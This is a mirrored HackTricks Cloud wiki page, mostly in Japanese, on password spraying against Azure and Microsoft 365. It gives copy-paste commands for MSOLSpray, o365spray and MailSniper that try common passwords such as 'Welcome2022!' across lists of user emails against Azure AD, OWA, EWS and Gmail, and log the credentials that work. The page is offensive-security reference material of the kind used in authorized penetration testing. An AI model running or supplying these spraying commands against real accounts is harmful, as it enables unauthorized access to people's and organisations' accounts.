gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-05 01:07:11 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
f8edb2537e64fbc2d3a926b1f9b2fbd0d5b60981
hacktricks-cloud/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md

1.5 KiB
Raw Blame History

Az - Password Spraying

{{#include ../../../banners/hacktricks-training.md}}

Password Spray

Azureでは、Azure AD Graph、Microsoft Graph、Office 365 Reporting webserviceなどの異なるAPIエンドポイントに対してこれを実行できます。

ただし、この技術は非常に騒がしいため、Blue Teamは簡単に検出できます。さらに、強制パスワードの複雑さMFAの使用により、この技術はほとんど無意味になる可能性があります。

MSOLSprayを使用してパスワードスプレー攻撃を実行できます。

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Or with o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Or with MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt

{{#include ../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink